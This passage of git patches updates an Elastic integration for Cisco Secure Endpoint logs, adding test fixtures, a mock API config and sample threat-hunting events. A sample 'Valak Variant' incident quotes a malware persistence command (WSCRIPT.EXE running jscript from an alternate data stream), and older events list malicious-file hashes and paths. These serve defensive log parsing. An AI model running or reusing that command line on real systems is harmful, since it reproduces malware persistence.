2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}",
+        "kind": "alert"
     },
     "cisco": {
-        "amp": {
+        "secure_endpoint": {
             "computer": {
                 "active": true,
                 "network_addresses": [
                     {
-                        "mac": "53:74:31:cb:37:50",
+                        "mac": "87:c2:d9:a2:8c:74",
                         "ip": "10.10.10.10"
                     }
                 ],
                 "connector_guid": "test_connector_guid",
                 "external_ip": "8.8.8.8"
             },
-            "file": {
-                "disposition": "Malicious",
-                "identity": {}
+            "threat_hunting": {
+                "severity": "critical",
+                "incident_title": "Valak Variant",
+                "incident_id": 416,
+                "incident_end_time": "2020-06-18T11:12:50.000Z",
+                "incident_start_time": "2021-01-15T10:48:08.000Z",
+                "incident_summary": "The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.",
+                "incident_remediation": "We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.",
+                "incident_report_guid": "6e5292d5-248c-49dc-839d-201bcba64562",
+                "incident_hunt_guid": "4bdbaf20-020f-4bb5-9da9-585da0e07817"
             },
             "connector_guid": "test_connector_guid",
             "related": {
                 "mac": [
-                    "53:74:31:cb:37:50"
+                    "87:c2:d9:a2:8c:74"
                 ]
             },
-            "group_guids": [
-                "test_group_guid"
+            "techniques": [
+                {
+                    "mitre_name": "technique",
+                    "tactics_names": "Collection",
+                    "system_requirements": "Privileges to access certain files and directories",
+                    "permissions": "",
+                    "name": "Data from Local System",
+                    "description": "\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\n\n\u003cp\u003eAdversaries may do this using a \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\"https://attack.mitre.org/software/S0106\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\"https://attack.mitre.org/techniques/T1119\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\n",
+                    "external_id": "T1005",
+                    "mitre_url": "https://attack.mitre.org/techniques/T1005",
+                    "data_sources": "File monitoring, Process monitoring, Process command-line parameters",
+                    "platforms": "Linux, macOS, Windows"
+                },
+                {
+                    "mitre_name": "technique",
+                    "tactics_names": "Execution, Persistence, Privilege Escalation",
+                    "permissions": "Administrator, SYSTEM, User",
+                    "name": "Scheduled Task/Job",
+                    "description": "\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\n",
+                    "external_id": "T1053",
+                    "mitre_url": "https://attack.mitre.org/techniques/T1053",
+                    "data_sources": "File monitoring, Process monitoring, Process command-line parameters, Windows event logs",
+                    "platforms": "Windows, Linux, macOS"
+                },
+                {
+                    "mitre_name": "technique",
+                    "tactics_names": "Defense Evasion, Execution",
+                    "permissions": "User",
+                    "name": "Scripting",
+                    "description": "\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\"https://attack.mitre.org/techniques/T1059\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\n\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\"https://attack.mitre.org/techniques/T1086\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\n\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\"https://attack.mitre.org/techniques/T1193\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\"https://attack.mitre.org/techniques/T1203\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\n\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\n",
+                    "external_id": "T1064",
+                    "mitre_url": "https://attack.mitre.org/techniques/T1064",
+                    "data_sources": "Process monitoring, File monitoring, Process command-line parameters",
+                    "platforms": "Linux, macOS, Windows"
+                }
             ],
-            "error": {
-                "description": "Delete pending",
-                "error_code": 3221225558
-            },
-            "detection_id": "6419229327140847663",
-            "event_type_id": 2164260880
+            "tactics": [
+                {
+                    "name": "Defense Evasion",
+                    "description": "\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\n\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\n",
+                    "mitre_name": "tactic",
+                    "external_id": "TA0005",
+                    "mitre_url": "https://attack.mitre.org/tactics/TA0005"
+                }
+            ],
+            "event_type_id": 1107296344
         }
     },
     "tags": [
@@ -215,10 +277,6 @@ An example event for `log` looks as following:
 | host.os.version | Operating system version as a raw string. | keyword |
 | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword |
 | input.type | Type of Filebeat input. | keyword |
-| log.file.path | Full path to the log file this event came from. | keyword |
-| log.flags | Flags for the log file. | keyword |
-| log.offset | Offset of the entry in the log file. | long |
-| log.source.address | Source address from which the log event was read / sent from. | keyword |
 | network.direction | Direction of the network traffic. Recommended values are:   \* ingress   \* egress   \* inbound   \* outbound   \* internal   \* external   \* unknown  When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword |
 | network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". | keyword |
 | process.hash.md5 | MD5 hash. | keyword |
@@ -233,4 +291,10 @@ An example event for `log` looks as following:
 | source.ip | IP address of the source (IPv4 or IPv6). | ip |
 | source.port | Port of the source. | long |
 | tags | List of keywords used to tag each event. | keyword |
+| threat.tactic.id | The id of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword |
+| threat.tactic.name | Name of the type of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/) | keyword |
+| threat.tactic.reference | The reference url of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | keyword |
+| threat.technique.id | The id of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword |
+| threat.technique.name | The name of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword |
+| threat.technique.reference | The reference url of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) | keyword |
 

From 24ee77b8863fa5b5fa872fc4b72fc78379d6c235 Mon Sep 17 00:00:00 2001
From: Alex Resnick <adr8292@gmail.com>
Date: Thu, 30 Sep 2021 02:07:11 +0000
Subject: [PATCH 6/9] rename log dataset to event.  Fix system tests

---
 .../_dev/build/docs/README.md                 |   8 +-
 .../_dev/deploy/docker/files/config.yml       |  54 ++-
 .../_dev/test/pipeline/test-cisco-amp1.log    |   0
 .../test-cisco-amp1.log-expected.json         | 219 +++++++-----
 .../_dev/test/pipeline/test-cisco-amp2.log    |   0
 .../test-cisco-amp2.log-expected.json         | 162 +++++----
 .../_dev/test/pipeline/test-cisco-amp3.log    |   0
 .../test-cisco-amp3.log-expected.json         | 135 +++++---
 .../_dev/test/pipeline/test-cisco-amp4.log    |   0
 .../test-cisco-amp4.log-expected.json         | 312 ++++++++++++------
 .../_dev/test/pipeline/test-cisco-amp5.log    |   0
 .../test-cisco-amp5.log-expected.json         | 192 +++++++----
 .../_dev/test/pipeline/test-cisco-amp6.log    |   0
 .../test-cisco-amp6.log-expected.json         | 165 +++++----
 .../_dev/test/pipeline/test-cisco-amp7.log    |   0
 .../test-cisco-amp7.log-expected.json         | 159 ++++++---
 .../_dev/test/pipeline/test-common-config.yml |   0
 .../_dev/test/system/test-default-config.yml  |   3 +-
 .../agent/stream/httpjson.yml.hbs             |   4 +-
 .../elasticsearch/ingest_pipeline/default.yml |   5 +
 .../{log => event}/fields/agent.yml           |   0
 .../{log => event}/fields/base-fields.yml     |   2 +-
 .../data_stream/{log => event}/fields/ecs.yml |   2 +
 .../{log => event}/fields/fields.yml          |  10 -
 .../data_stream/{log => event}/manifest.yml   |   0
 .../{log => event}/sample_event.json          |   0
 packages/cisco_secure_endpoint/docs/README.md |   8 +-
 27 files changed, 935 insertions(+), 505 deletions(-)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp1.log (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp1.log-expected.json (97%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp2.log (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp2.log-expected.json (97%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp3.log (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp3.log-expected.json (97%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp4.log (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp4.log-expected.json (97%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp5.log (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp5.log-expected.json (98%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp6.log (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp6.log-expected.json (97%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp7.log (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-cisco-amp7.log-expected.json (97%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/pipeline/test-common-config.yml (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/_dev/test/system/test-default-config.yml (74%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/agent/stream/httpjson.yml.hbs (95%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/elasticsearch/ingest_pipeline/default.yml (99%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/fields/agent.yml (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/fields/base-fields.yml (94%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/fields/ecs.yml (98%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/fields/fields.yml (97%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/manifest.yml (100%)
 rename packages/cisco_secure_endpoint/data_stream/{log => event}/sample_event.json (100%)

diff --git a/packages/cisco_secure_endpoint/_dev/build/docs/README.md b/packages/cisco_secure_endpoint/_dev/build/docs/README.md
index ed51d2fb1c3..dc84ecee35d 100644
--- a/packages/cisco_secure_endpoint/_dev/build/docs/README.md
+++ b/packages/cisco_secure_endpoint/_dev/build/docs/README.md
@@ -3,14 +3,14 @@
 This integration is for Cisco Secure Endpoint logs. It includes the following
 datasets for receiving logs over syslog or read from a file:
 
-- `log` dataset: supports Cisco Secure Endpoint logs.
+- `event` dataset: supports Cisco Secure Endpoint Event logs.
 
 ## Logs
 
 ### Secure Endpoint
 
-The `log` dataset collects Cisco Secure Endpoint logs.
+The `event` dataset collects Cisco Secure Endpoint logs.
 
-{{event "log"}}
+{{event "event"}}
 
-{{fields "log"}}
+{{fields "event"}}
diff --git a/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml b/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
index 04c76e4c5a6..3aa55c7ad03 100644
--- a/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
+++ b/packages/cisco_secure_endpoint/_dev/deploy/docker/files/config.yml
@@ -1,31 +1,65 @@
 rules:
   - path: /v1/events
     methods: ["GET"]
-    request_headers:
-      Authorization:
-        - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
+    # request_headers:
+    # Authorization:
+    #   - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
     query_params:
-      offset: "{offset:.*}"
-      limit: "{limit:.*}"
-      start_date: "{start_date:.*}"
+      offset: "1"
+      limit: "1"
+      start_date: "{start_date:\\d{4}(?:-\\d{2}){2}T(?:\\d{2})(?::\\d{2}){2}\\+00:00}"
     responses:
       - status_code: 200
+        headers:
+          Content-Type:
+            - application/json
         body: |-
           {
             "version": "v1.2.0",
             "metadata": {
               "links": {
-                "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?limit={{ .request.vars.limit }}&offset={{ .request.vars.offset }}",
+                "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?start_date={{ .request.vars.start_date }}&limit=1&offset=1"
               },
               "results": {
-                "total": 4,
+                "total": 2,
+                "current_item_count": 1,
+                "index": 1,
+                "items_per_page": 1
+              }
+            },
+            "data": [
+              {"timestamp":1610711992,"timestamp_nanoseconds":155518026,"date":"2021-01-15T11:59:52+00:00","event_type":"SecureX Threat Hunting Incident","event_type_id":1107296344,"connector_guid":"test_connector_guid","severity":"Critical","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Threat_Hunting","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"87:c2:d9:a2:8c:74"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"threat_hunting":{"incident_report_guid":"6e5292d5-248c-49dc-839d-201bcba64562","incident_hunt_guid":"4bdbaf20-020f-4bb5-9da9-585da0e07817","incident_title":"Valak Variant","incident_summary":"The host Demo_Threat_Hunting is compromised by a Valak malware variant.  Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information.  Based on the event details listed and the techniques used, we recommend the host in question be investigated further.","incident_remediation":"We recommend the following:\r\n\r\n- Isolation of the affected hosts from the network\r\n- Perform forensic investigation\r\n    - Review all activity performed by the user\r\n    - Upload any suspicious files to ThreatGrid for analysis\r\n    - Search the registry for data \"var config = ( COMMAND_C2\" and remove the key\r\n    - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\r\n    - Remove the Alternate Data Stream file located C:\\Users\\Public\\PowerManagerSpm.jar:LocalZone.\r\n- If possible, reimage the affected system to prevent potential unknown persistence methods.","incident_id":416,"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"<p>The adversary is trying to avoid being detected.</p>\n\n<p>Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.</p>\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"<p>Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</p>\n\n<p>Adversaries may do this using a <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a>, such as <a href=\"https://attack.mitre.org/software/S0106\">cmd</a>, which has functionality to interact with the file system to gather information. Some adversaries may also use <a href=\"https://attack.mitre.org/techniques/T1119\">Automated Collection</a> on the local system.</p>\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"<p>Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)</p>\n\n<p>Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).</p>\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"<p><strong>This technique has been deprecated. Please use <a href=\"https://attack.mitre.org/techniques/T1059\">Command and Scripting Interpreter</a> where appropriate.</strong></p>\n\n<p>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and <a href=\"https://attack.mitre.org/techniques/T1086\">PowerShell</a> but could also be in the form of command-line batch scripts.</p>\n\n<p>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in <a href=\"https://attack.mitre.org/techniques/T1193\">Spearphishing Attachment</a> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through <a href=\"https://attack.mitre.org/techniques/T1203\">Exploitation for Client Execution</a>, where adversaries will rely on macros being allowed or that the user will accept to activate them.</p>\n\n<p>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)</p>\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}
+            ]
+          }
+  - path: /v1/events
+    methods: ["GET"]
+    # request_headers:
+    # Authorization:
+    #   - "Basic YWJjZC1hYmNkOnh4eHh4eHh4eHg="
+    query_params:
+      limit: "1"
+      start_date: "{start_date:\\d{4}(?:-\\d{2}){2}T(?:\\d{2})(?::\\d{2}){2}\\+00:00}"
+    responses:
+      - status_code: 200
+        headers:
+          Content-Type:
+            - application/json
+        body: |-
+          {
+            "version": "v1.2.0",
+            "metadata": {
+              "links": {
+                "self": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?start_date={{ .request.vars.start_date }}&limit=1",
+                "next": "http://{{ hostname }}:{{ env "PORT" }}/v1/events?start_date={{ .request.vars.start_date }}&limit=1&offset=1"
+              },
+              "results": {
+                "total": 2,
                 "current_item_count": 1,
                 "index": 0,
                 "items_per_page": 1
               }
             },
             "data": [
-              {"id":6180352115244794000,"timestamp":1582222838,"timestamp_nanoseconds":279000000,"date":"2020-02-20T18:20:38+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","group_guids":["6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"],"severity":"Medium","computer":{"connector_guid":"20a0ce9f-44d1-4cbb-ab04-8a0705448b72","hostname":"Demo_Upatre","external_ip":"69.226.122.127","user":"A@TEMPLATE-W7X86","active":true,"network_addresses":[{"ip":"230.122.135.241","mac":"3f:1e:b2:28:25:24"}],"links":{"computer":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72","trajectory":"https://api.amp.cisco.com/v1/computers/20a0ce9f-44d1-4cbb-ab04-8a0705448b72/trajectory","group":"https://api.amp.cisco.com/v1/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}},
-              {"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"ThreatDetected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}
